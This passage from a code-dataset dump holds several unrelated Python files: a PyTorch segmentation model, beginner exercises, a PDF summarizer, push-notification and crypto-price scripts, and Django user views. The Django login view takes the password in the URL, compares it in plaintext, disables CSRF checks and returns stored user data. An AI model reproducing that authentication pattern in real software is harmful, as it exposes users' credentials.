닫기, 시간 측정 마무리\nconn.send(destination, \"SHUTDOWN\", persistent='true')\nprint(\" endtime:\", time.time() - start)\nconn.disconnect()\n","repo_name":"passionleader/Message-Queue-Performance-test","sub_path":"Publisher(client-side)/stat_pub_and_timechk_activemq.py","file_name":"stat_pub_and_timechk_activemq.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7751578614","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nfrom sklearn.neighbors import kneighbors_graph\nimport sklearn\nimport numpy as np\nimport scipy.sparse as sp\nimport scipy\nimport math\nfrom torch.nn.parameter import Parameter\n\n\n# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py\ndef get_upsampling_weight(in_channels, out_channels, kernel_size):\n \"\"\"Make a 2D bilinear kernel suitable for upsampling\"\"\"\n factor = (kernel_size + 1) // 2\n if kernel_size % 2 == 1:\n center = factor - 1\n else:\n center = factor - 0.5\n og = np.ogrid[:kernel_size, :kernel_size]\n filt = (1 - abs(og[0] - center) / factor) * \\\n (1 - abs(og[1] - center) / factor)\n weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),\n dtype=np.float64)\n weight[range(in_channels), range(out_channels), :, :] = filt\n return torch.from_numpy(weight).float()\n\n\ndef freeze(m):\n for p in m.parameters():\n p.requires_grad = False\n\nclass _NonLocalBlockND(nn.Module):\n def __init__(self, in_channels, inter_channels=None, dimension=2, sub_sample=True, bn_layer=True):\n super(_NonLocalBlockND, self).__init__()\n\n self.sub_sample = sub_sample\n\n self.in_channels = in_channels\n self.inter_channels = inter_channels\n\n if self.inter_channels is None:\n self.inter_channels = in_channels // 2\n if self.inter_channels == 0:\n 
self.inter_channels = 1\n\n conv_nd = nn.Conv2d\n max_pool_layer = nn.MaxPool2d(kernel_size=(2, 2))\n bn = nn.BatchNorm2d\n\n self.g = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if bn_layer:\n self.W = nn.Sequential(\n conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0),\n bn(self.in_channels)\n )\n nn.init.constant_(self.W[1].weight, 0)\n nn.init.constant_(self.W[1].bias, 0)\n else:\n self.W = conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0)\n # nn.init.constant_(self.W.weight, 0)\n # nn.init.constant_(self.W.bias, 0)\n\n self.theta = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n self.phi = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if sub_sample:\n self.g = nn.Sequential(self.g, max_pool_layer)\n self.phi = nn.Sequential(self.phi, max_pool_layer)\n\n def forward(self, x):\n '''\n :param x: (b, c, t, h, w)\n :return:\n '''\n\n batch_size = x.size(0)\n\n g_x = self.g(x).view(batch_size, self.inter_channels, -1)\n g_x = g_x.permute(0, 2, 1)\n\n theta_x = self.theta(x).view(batch_size, self.inter_channels, -1)\n theta_x = theta_x.permute(0, 2, 1)\n phi_x = self.phi(x).view(batch_size, self.inter_channels, -1)\n f = torch.matmul(theta_x, phi_x)\n f_div_C = F.softmax(f, dim=-1)\n\n y = torch.matmul(f_div_C, g_x)\n y = y.permute(0, 2, 1).contiguous()\n y = y.view(batch_size, self.inter_channels, *x.size()[2:])\n W_y = self.W(y)\n z = W_y + x\n\n return z\n\ndef grid(h, w, dtype=np.float32):\n \"\"\"Return the embedding of a grid graph.\"\"\"\n M = h * w\n x = np.linspace(0, 1, w, dtype=dtype)\n y = np.linspace(0, 1, h, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z\n\ndef distance_sklearn_metrics(z, k=4, metric='euclidean'):\n \"\"\"Compute exact pairwise distances.\"\"\"\n # d = sklearn.metrics.pairwise.pairwise_distances(\n # z, metric=metric, n_jobs=-2)\n # d = scipy.spatial.distance.pdist(z, 'euclidean')\n # d = scipy.spatial.distance.squareform(d)\n\n z = torch.from_numpy(z).cuda()\n r = torch.mm(z, z.permute(1, 0))\n N = r.size()[0]\n HW = r.size()[1]\n\n diag = r.diag().unsqueeze(0)\n diag = diag.expand_as(r)\n # compute the distance matrix\n D = (diag + diag.t() - 2 * r).sqrt()\n topk, indices = torch.topk(D, k=k + 1, largest=False)\n del D\n del diag\n del r\n\n return topk[:, 1:], indices[:, 1:]\n # k-NN graph.\n # idx = np.argsort(d)[:, 1:k+1]\n # d.sort()\n # d = d[:, 1:k+1]\n # return d, idx\n\ndef adjacency(dist, idx):\n \"\"\"Return the adjacency matrix of a kNN graph.\"\"\"\n M, k = dist.size()\n # assert M, k == idx.shape\n # assert dist.min() >= 0\n\n # Weights.\n sigma2 = torch.mean(dist[:, -1])**2\n dist = torch.exp(- dist**2 / sigma2)\n\n # Weight matrix.\n I = torch.arange(0, M).repeat_interleave(k).contiguous().view(1, -1).cuda()\n J = idx.contiguous().view(1, -1)\n V = dist.contiguous().view(-1)\n indices = torch.cat([I, J], dim=0)\n W = torch.sparse.FloatTensor(indices, V, torch.Size([M, M])).cuda()\n # W = scipy.sparse.coo_matrix((V.cpu().numpy(), (I.cpu().numpy(), J.cpu().numpy())), shape=(M, M))\n\n # No self-connections.\n # W.setdiag(1)\n\n # Non-directed graph.\n # bigger = W.T > W\n # W = W - W.multiply(bigger) + W.T.multiply(bigger)\n #\n # assert W.nnz % 
2 == 0\n # assert np.abs(W - W.T).mean() < 1e-10\n # assert type(W) is scipy.sparse.csr.csr_matrix\n return W\n\ndef build_graph(x, k=4):\n N, C, H, W = x.size()\n # tempx = x.permute(0, 2, 3, 1).contiguous().view(-1, C).cpu().numpy()\n # graph = kneighbors_graph(tempx, 8, mode='connectivity', include_self=True)\n # h_idx = np.arange(H)\n # w_idx = np.arange(W)\n # a = np.reshape(np.meshgrid(h_idx, w_idx), (2, -1)).T\n # graph = kneighbors_graph(a, 4, mode='connectivity', include_self=True)\n # adj = graph.tocoo()\n # rowsum = np.array(graph.sum(1))\n # d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n # d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n # d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n # adj = graph.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)\n # adj = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n # indices = torch.from_numpy(\n # np.vstack((adj.row, adj.col)).astype(np.int64))\n # values = torch.from_numpy(adj.data)\n # shape = torch.Size(adj.shape)\n # return torch.from_numpy(adj).cuda()\n graph = grid(H, W)\n # graph = x\n # graph = graph.permute(0, 2, 3, 1).contiguous().view(N*H*W, C)\n dist, idx = distance_sklearn_metrics(graph, k=4, metric='euclidean')\n A = adjacency(dist, idx)\n A = A.to_dense() + torch.eye(A.size(0)).cuda()\n # A = laplacian(A, normalized=True)\n # A = A.tocoo()\n # rowsum = np.array(A.sum(1))\n # d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n # d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n # d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n # A = A.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n D = torch.sum(A, dim=1)\n D = torch.pow(D, -0.5)\n D = torch.diag(D)\n A = torch.mm(torch.mm(A, D).t(), D)\n return A\n # indices = torch.from_numpy(\n # np.vstack((A.row, A.col)).astype(np.int64))\n # values = torch.from_numpy(A.data)\n # shape = torch.Size(A.shape)\n # return torch.sparse.FloatTensor(indices, values, shape).cuda()\n\ndef laplacian(W, normalized=True):\n \"\"\"Return the Laplacian of the weigth matrix.\"\"\"\n\n # Degree matrix.\n d = W.sum(dim=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n else:\n # d += np.spacing(np.array(0, W.dtype))\n d = 1 / torch.sqrt(d)\n D = torch.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, nhid)\n\n def forward(self, x, adj):\n identity = x\n x = F.relu(self.gc1(x, adj))\n x = self.gc2(x, adj)\n x = x + identity\n x = F.relu(x, inplace=True)\n return x\n\nclass GraphConvolution(nn.Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. 
/ math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n N, C, H, W = input.size()\n input = input.permute(0, 2, 3, 1).contiguous().view(-1, C)\n support = torch.matmul(input, self.weight)\n output = torch.matmul(adj.float(), support)\n if self.bias is not None:\n output = output + self.bias\n output = output.view(N, H, W, C).permute(0, 3, 1, 2).contiguous()\n return output\n\nclass FCN8sAtOnce(nn.Module):\n def __init__(self, n_classes):\n super(FCN8sAtOnce, self).__init__()\n\n features1 = []\n # conv1\n features1.append(nn.Conv2d(3, 64, 3, padding=100))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(64, 64, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/2\n\n # conv2\n features1.append(nn.Conv2d(64, 128, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(128, 128, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/4\n\n # conv3\n features1.append(nn.Conv2d(128, 256, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(256, 256, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(256, 256, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/8\n self.features1 = nn.Sequential(*features1)\n\n features2 = []\n # conv4\n features2.append(nn.Conv2d(256, 512, 3, padding=1))\n features2.append(nn.ReLU(inplace=True))\n features2.append(nn.Conv2d(512, 512, 3, padding=1))\n features2.append(nn.ReLU(inplace=True))\n features2.append(nn.Conv2d(512, 512, 3, padding=1))\n features2.append(nn.ReLU(inplace=True))\n features2.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/16\n self.features2 = nn.Sequential(*features2)\n\n features3 = []\n # conv5\n features3.append(nn.Conv2d(512, 512, 3, padding=1))\n features3.append(nn.ReLU(inplace=True))\n features3.append(nn.Conv2d(512, 512, 3, padding=1))\n features3.append(nn.ReLU(inplace=True))\n features3.append(nn.Conv2d(512, 512, 3, padding=1))\n features3.append(nn.ReLU(inplace=True))\n features3.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/32\n self.features3 = nn.Sequential(*features3)\n\n fc = []\n # fc6\n fc.append(nn.Conv2d(512, 4096, 7))\n fc.append(nn.ReLU(inplace=True))\n fc.append(nn.Dropout2d())\n\n # fc7\n fc.append(nn.Conv2d(4096, 4096, 1))\n fc.append(nn.ReLU(inplace=True))\n fc.append(nn.Dropout2d())\n self.fc = nn.Sequential(*fc)\n\n self.score_fr = nn.Conv2d(4096, n_classes, 1)\n self.score_pool3 = nn.Conv2d(256, n_classes, 1)\n self.score_pool4 = nn.Conv2d(512, n_classes, 1)\n\n self.upscore2 = nn.ConvTranspose2d(\n n_classes, n_classes, 4, stride=2, bias=False)\n self.upscore8 = nn.ConvTranspose2d(\n n_classes, n_classes, 16, stride=8, bias=False)\n self.upscore_pool4 = nn.ConvTranspose2d(\n n_classes, n_classes, 4, stride=2, bias=False)\n freeze(self.upscore2)\n freeze(self.upscore8)\n freeze(self.upscore_pool4)\n\n # self.non_local = _NonLocalBlockND(256)\n self.non_local2 = _NonLocalBlockND(512, bn_layer=False)\n # self.gnn1 = GCN(256, 256)\n # self.gnn2 = GCN(512, 512)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in [self.score_fr, self.score_pool3, self.score_pool4]:\n m.weight.data.zero_()\n m.bias.data.zero_()\n\n for m in 
[self.upscore2, self.upscore8, self.upscore_pool4]:\n assert m.kernel_size[0] == m.kernel_size[1]\n initial_weight = get_upsampling_weight(\n m.in_channels, m.out_channels, m.kernel_size[0])\n m.weight.data.copy_(initial_weight)\n \n vgg16 = torchvision.models.vgg16(pretrained=True)\n vgg_features = [\n vgg16.features[:17],\n vgg16.features[17:24],\n vgg16.features[24:],\n ]\n features = [\n self.features1,\n self.features2,\n self.features3,\n ]\n\n for l1, l2 in zip(vgg_features, features):\n for ll1, ll2 in zip(l1.children(), l2.children()):\n if isinstance(ll1, nn.Conv2d) and isinstance(ll2, nn.Conv2d):\n assert ll1.weight.size() == ll2.weight.size()\n assert ll1.bias.size() == ll2.bias.size()\n ll2.weight.data.copy_(ll1.weight.data)\n ll2.bias.data.copy_(ll1.bias.data)\n\n # freeze(ll2)\n\n for l1, l2 in zip(vgg16.classifier.children(), self.fc):\n if isinstance(l1, nn.Linear) and isinstance(l2, nn.Conv2d):\n l2.weight.data.copy_(l1.weight.data.view(l2.weight.size()))\n l2.bias.data.copy_(l1.bias.data.view(l2.bias.size()))\n\n # freeze(l2)\n\n def forward(self, x):\n pool3 = self.features1(x) # 1/8\n\n # graph = F.interpolate(x, size=(pool3.size()[2], pool3.size()[3]), mode='bilinear', align_corners=True)\n # adj = build_graph(graph, k=10)\n # pool3 = self.gnn1(pool3, adj)\n # pool3 = self.non_local(pool3)\n # pool3 = pool31 + pool32\n\n pool4 = self.features2(pool3) # 1/16\n\n # graph = F.interpolate(x, size=(pool4.size()[2], pool4.size()[3]), mode='bilinear', align_corners=True)\n # adj = build_graph(graph, k=10)\n # pool4 = self.gnn2(pool4, adj)\n\n pool5 = self.features3(pool4) # 1/32\n pool5 = self.non_local2(pool5)\n out = self.fc(pool5)\n out = self.score_fr(out)\n upscore2 = self.upscore2(out) # 1/16\n\n # score_pool4 = self.score_pool4(pool4 * 0.01) # XXX: scaling to train at once\n score_pool4 = self.score_pool4(pool4)\n score_pool4 = score_pool4[:, :, 5:5 + upscore2.size()[2], 5:5 + upscore2.size()[3]]\n upscore_pool4 = self.upscore_pool4(upscore2 + score_pool4) # 1/8\n del upscore2\n del score_pool4\n # score_pool3 = self.score_pool3(pool3 * 0.0001) # XXX: scaling to train at once\n score_pool3 = self.score_pool3(pool3)\n score_pool3 = score_pool3[:, :,\n 9:9 + upscore_pool4.size()[2],\n 9:9 + upscore_pool4.size()[3]]\n out = self.upscore8(upscore_pool4 + score_pool3)\n\n out = out[:, :, 31:31 + x.size()[2], 31:31 + x.size()[3]].contiguous()\n\n return out\n\n def get_parameters(self):\n for m in self.modules():\n for p in m.parameters():\n if p.requires_grad:\n yield p","repo_name":"GitLanx/MultiModalSeg","sub_path":"Models/FCN.py","file_name":"FCN.py","file_ext":"py","file_size_in_byte":16297,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"21840278831","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\nfrom .models import Users\nfrom users.serializers import UsersSerializer\n\n\n# Create your views here.\n@csrf_exempt\ndef user_list(request):\n \"\"\"\n List all code users, or create a new user\n \"\"\"\n if request.method == 'GET':\n users = Users.objects.all()\n serializer = UsersSerializer(users, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'POST':\n data = JSONParser().parse((request))\n serializer = UsersSerializer(data = data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, 
status=201)\n return JsonResponse(serializer.errors, status=400)\n\n\n@csrf_exempt\ndef user(request, login_id, login_pw):\n \"\"\"\n get User by login_id, confirm right pw\n \"\"\"\n try:\n db_user = Users.objects.get(login_id=login_id)\n except Users.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = UsersSerializer(db_user)\n return JsonResponse(serializer.data)\n elif request.method == 'POST':\n serializer = UsersSerializer(db_user)\n db_login_pw = serializer.data['login_pw']\n if login_pw == db_login_pw: # 로그인 성공:\n return JsonResponse(serializer.data, status=200)\n else:\n return HttpResponse(status=400)","repo_name":"TrellixVulnTeam/ingook_U4RG","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73703261052","text":"\"\"\"\nAuthor: Shilo Wilson\n\n6) Create three generator expressions and use itertools.chain to attach them together. Print out the result as a list.\n\n7) Create three generator expressions and zip them together. Print out the result as a list.\n\n8) Create three generator expressions and use the appropriate itertools function to get all the combinations of the values.\n Print out the result as a list.\n\"\"\"\nfrom itertools import chain\nfrom itertools import izip\nfrom itertools import product\n\n\ndef oddIntegers(n):\n i=0\n while i <= n:\n yield i*2 + 1\n i += 1\n\n\ndef fact(n):\n i = 0\n prev = 1\n while i <=n:\n yield max(1, i*prev)\n prev = max(1, i*prev)\n i += 1\n\n\ndef squares(n):\n i=0\n while i <= n:\n yield i**2\n i += 1\n\n\ndef main():\n print ('========== Exercises 3.2.6, 3.2.7, 3.2.8 ==========\\n')\n\n odd = oddIntegers(5)\n facts = fact(5)\n square = squares(5)\n\n chained = chain(odd, facts, square)\n print('Chained List: {}'.format(list(chained)))\n\n odd = oddIntegers(5)\n facts = fact(5)\n square = squares(5)\n\n zipped = izip(odd, facts, square)\n print('Zipped List: {}'. 
format(list(zipped)))\n\n odd = oddIntegers(5)\n facts = fact(5)\n square = squares(5)\n\n prod = product(odd, facts, square)\n print('Products {}'.format(list(prod)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ssw1991/Python-Practice","sub_path":"Module 3 - Shilo Wilson/Level 3.2/3.2.6 _8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72819512573","text":"from PyPDF2 import PdfReader\nimport nltk\nimport heapq\nfrom pdfminer.high_level import extract_text\nfrom nltk import word_tokenize,sent_tokenize\nimport re\nimport PyPDF2\nimport spacy\n\n\nnlp = spacy.load(\"es_core_news_lg\")\nnlp.max_length = 2000000 # 2 millones de caracteres\n\n\ndef generate_resumen(file_path, num_sentences):\n \n # Extraer texto del PDF\n article_text = PdfReader(file_path)\n number_of_pages = len(article_text.pages)\n \n all_text = \"\"\n\n for i in range(number_of_pages):\n page = article_text.pages[i]\n text = page.extract_text()\n all_text += text # Agregar el texto de cada página a la variable `all_text`\n\n \n # Removing Square Brackets and Extra Spaces\n all_text = re.sub(r'\\[[0-9]*\\]', ' ', all_text) \n all_text = re.sub(r'\\s+', ' ', all_text) \n \n formatted_article_text = re.sub('[^a-zA-Z]', ' ', all_text ) \n formatted_article_text = re.sub(r'\\s+', ' ', formatted_article_text) \n #nltk.download()\n #EN ESTA PARTE HACE LA TOKENIZACION \n sentence_list = nltk.sent_tokenize(all_text) \n \n #EN ESTA PARTE ENCUENTRA LA FRECUENCIA DE CADA PALABRA\n stopwords = nltk.corpus.stopwords.words('spanish')\n \n word_frequencies = {} \n for word in nltk.word_tokenize(formatted_article_text): \n if word not in stopwords:\n if word not in word_frequencies.keys():\n word_frequencies[word] = 1\n else:\n word_frequencies[word] += 1\n \n\n if word_frequencies:\n maximum_frequency = max(word_frequencies.values())\n else:\n maximum_frequency = 0\n\n \n for word in word_frequencies.keys(): \n word_frequencies[word] = (word_frequencies[word]/maximum_frequency)\n \n #CALCULA LAS FRASES QUE MÁS SE REPITEN\n sentence_scores = {} \n for sent in sentence_list: \n for word in nltk.word_tokenize(sent.lower()):\n if word in word_frequencies.keys():\n if len(sent.split(' ')) < 40:\n if sent not in sentence_scores.keys():\n sentence_scores[sent] = word_frequencies[word]\n else:\n sentence_scores[sent] += word_frequencies[word]\n \n #REALIZA EL RESUMEN CON LAS MEJORES FRASES\n \n summary_sentences = heapq.nlargest(num_sentences, sentence_scores, key=sentence_scores.get)\n \n summary = ' '.join(summary_sentences) \n \n return summary \n ","repo_name":"GuidoVovk/Django-PNL","sub_path":"text/resume.py","file_name":"resume.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33215683510","text":"#Formatter variable assigned for curly braces\nformatter = \"{} {} {} {}\"\n\n#Display formatted formatter using the .format function to display 1 2 3 4\n# An error occurs if the intergers entered are not up to 4 spaces(index) as per \"{} {} {} {}\"\nprint(formatter.format(1, 2, 3,4))\n#As above, but displaying strings ==> must be four spaces seperated by comma\nprint(formatter.format(\"one\", \"two\", \"three\", \"four\"))\n#As above, but displaying boolean ==> must be four spaces seperated by comma\nprint(formatter.format(True, False, False, True))\n#As above, but this time only displaying the 
content of the formatter ==> must be four spaces seperated by comma\nprint(formatter.format(formatter, formatter, formatter, formatter))\n#As above, but displaying string sentences in groups of four ==> must be four spaces, seperated by comma\nprint(\n \"Try your\",\n \"Own text here\",\n \"Maybe a poem\",\n \"Or a song about fear\"\n)\n\nprint(formatter.format(\n \"Try your\",\n \"Own text here\",\n \"Maybe a poem\",\n \"Or a song about fear\"\n))","repo_name":"champ886/champ","sub_path":"ex8.py","file_name":"ex8.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6208939000","text":"def check():\n print(\"Vowel Checker\")\n word = input(\"Enter a word \\n\")\n vowel = ['a', 'e', 'i', 'o', 'u']\n ver = False\n for i in vowel:\n if i in word:\n ver = True\n\n if ver == True:\n print(\"Contains Vowel\")\n if ver == False:\n print(\"No Vowel\")\n\n\ncheck()\n","repo_name":"dollarkid1/pythonProjectSemicolon","sub_path":"Exercises/VowelChecker.py","file_name":"VowelChecker.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21294413269","text":"\"\"\"Chore to send push notifications.\"\"\"\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom pyfcm import FCMNotification\nfrom notifications.models import Notification\n\nfrom helpers.fcm import send_notification_fcm\nfrom helpers.fcm import send_fcm_notification_message\nfrom helpers.fcm import get_rich_notification\nfrom helpers.webpush import send_notification_webpush\n\nclass Command(BaseCommand):\n help = 'Sends push notifications'\n\n def handle(self, *args, **options): # noqa: C901\n \"\"\"Send Push notifications.\"\"\"\n\n webpush_sent = 0\n webpush_total = 0\n fcm_sent = 0\n\n push_service = FCMNotification(api_key=settings.FCM_SERVER_KEY)\n\n # Iterate all unsent notifications\n for notification in Notification.objects.filter(emailed=False)[:1000]:\n\n # Check invalid subscriptions\n if not notification or not notification.actor:\n continue\n\n # Get the user's profile\n profile = notification.recipient.profile\n\n # Check bad users\n if not profile:\n continue\n\n # Stop the spam!\n notification.emailed = True\n notification.save()\n\n # Get rich notification\n data_message = get_rich_notification(notification)\n\n # Retro method for transition\n if profile.fcm_id and profile.fcm_id != '':\n send_fcm_notification_message(push_service, profile.fcm_id, data_message)\n\n # Send FCM push notification\n for device in profile.devices.all():\n fcm_sent += send_notification_fcm(push_service, device, data_message)\n\n # For each web push subscription\n for subscription in profile.web_push_subscriptions.all():\n webpush_total += 1\n webpush_sent += send_notification_webpush(subscription, data_message)\n\n print(\n \"WebPush:\", webpush_sent,\n \"WebPush FAIL:\", webpush_total - webpush_sent,\n \"FCM:\", fcm_sent\n )\n self.stdout.write(self.style.SUCCESS('Push notification chore completed successfully'))\n","repo_name":"DevCom-IITB/instiapp-api","sub_path":"other/management/commands/push-notify.py","file_name":"push-notify.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"74550888573","text":"# loading in modules\nimport sqlite3\nimport pandas as pd\nimport csv\n\n\ndef 
from_db_table_to_csv(csv_filename):\n dbfile = \"databaseMEUS.db\"\n # Create a SQL connection to the database\n conn = sqlite3.connect(dbfile)\n\n # Get the info_history_table and export it to csv\n sql_query = pd.read_sql_query(\"SELECT * FROM info_history_tab\", conn)\n sql_query.to_csv(csv_filename, index=False)\n\n # Close the connection\n conn.close()\n\n\ndef count_contributing_agents(csv_filename, output_filename):\n with open(csv_filename) as f:\n csv_file = csv.DictReader(f)\n observers = []\n contributing_agents = []\n\n # iterating over each row and append\n # values to empty list\n for row in csv_file:\n observers.append(row['observer'])\n contributing_agents.append(row['a1'])\n contributing_agents.append(row['a2'])\n\n n_observers = len(set(observers))\n n_contributing_agents = len(set(contributing_agents))\n\n header = ['n_observers', 'n_contributors']\n data = [n_observers, n_contributing_agents]\n\n with open(output_filename, 'w', encoding='UTF8') as f:\n writer = csv.writer(f)\n # write the header\n writer.writerow(header)\n # write the data\n writer.writerow(data)","repo_name":"lucregrassi/MEUS","sub_path":"db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5044755480","text":"from functools import reduce\nfrom indicators.price import *\nfrom utils.colors import *\n\nYAML_LIST_NAME = yaml_to_dict(f'/ressources/coin.yaml')\n\n\n\n\n\ndef get_info(df: pd.DataFrame):\n high = reduce(lambda x, y: x if x > y else y, df.HIGH)\n low = reduce(lambda x, y: x if x < y else y, df.HIGH)\n close = df.iloc[len(df)-1].CLOSE\n pivot_point = float(float(high) + float(low) + float(close)) / 3\n\n f_resi = '{:.15f}'.format((2* pivot_point) - float(low))\n f_support = '{:.15f}'.format((2 * pivot_point) - float(high))\n\n s_resi = '{:.15f}'.format(pivot_point + (float(high) - float(low)))\n s_support = '{:.15f}'.format(pivot_point - (float(high) + float(low)))\n\n t_resi = '{:.15f}'.format(float(high) + 2 * (pivot_point - float(low)))\n t_support = '{:.15f}'.format(float(low) - 2 * (float(high) - pivot_point))\n\n print(f'{bcolors.OKGREEN}FIRST RESISTANCE : {f_resi} \\nFIRST SUPPORT : {f_support}{bcolors.ENDC}')\n print(f'{bcolors.OKGREEN}SECOND RESISTANCE : {s_resi} \\nSECOND SUPPORT : {s_support}{bcolors.ENDC}')\n print(f'{bcolors.OKGREEN}THIRD RESISTANCE : {t_resi} \\nTHIRD SUPPORT : {t_support}{bcolors.ENDC}')\n print('')\n\n\n\n\nif __name__ == '__main__':\n # get_price('LTC')\n # for coin in YAML_LIST_NAME['coin']:\n # get_info(get_df(coin))\n get_info(get_df('CRV', hours = 4))\n # print(r.text)","repo_name":"KevTeng/Coin_tracker","sub_path":"indicators/support_resi.py","file_name":"support_resi.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72095544253","text":"# 4 işlem hesap makşinesi\n\nsayi1 = float(input(\"1. sayıyı: \"))\nislem = input(\"Toplama için (+) Çıkarma için (-) Çarpım(*) Bölme(/) girin: \")\nsayi2 = float(input(\"2. 
sayıyı: \"))\n\nif islem == \"+\" or islem == \"-\" or islem == \"*\" or islem == \"/\":\n if islem == \"+\":\n sonuc = sayi1 + sayi2\n print(\"Toplamı:\",sonuc)\n elif islem == \"-\":\n sonuc = sayi1 - sayi2\n print(\"Farkı:\",sonuc)\n elif islem == \"*\":\n sonuc = sayi1 * sayi2\n print(\"Çarpım\",sonuc)\n elif islem == \"/\":\n sonuc = sayi1 / sayi2\n print(\"Bölüm\",sonuc)\n sonuc= round(sonuc,2)\n print(sayi1 , islem , sayi2 ,\"=\", sonuc)\nelse:\n print(\"Hatalı işlem\")\n\n\n\n\n#Vize-final-Ortalama hesabı\n\nvize = float(input(\"Vize notunuzu giriniz: \"))\nfinal = float(input(\"Final notunuzu giriniz: \"))\nortalama = round((vize * 0.4) + (final * 0.6),2)\nif(ortalama >=80):\n print(\"Harf Notu: AA\")\nelif(ortalama>=70):\n print(\"Harf Notu: BB\")\nelif(ortalama>=60):\n print(\"Harf Notu: CC\")\nelif(ortalama>=50):\n print(\"Harf Notu: DD\")\nelif(ortalama<=49):\n print(\"Harf Notu: FF\")\nx = f\"Ortalama : {ortalama}\"\nprint(x)\n\n","repo_name":"umitcangungor/etiya-6-python-master","sub_path":"2.Gün Pair Çalışması.py","file_name":"2.Gün Pair Çalışması.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1429473360","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.metrics import 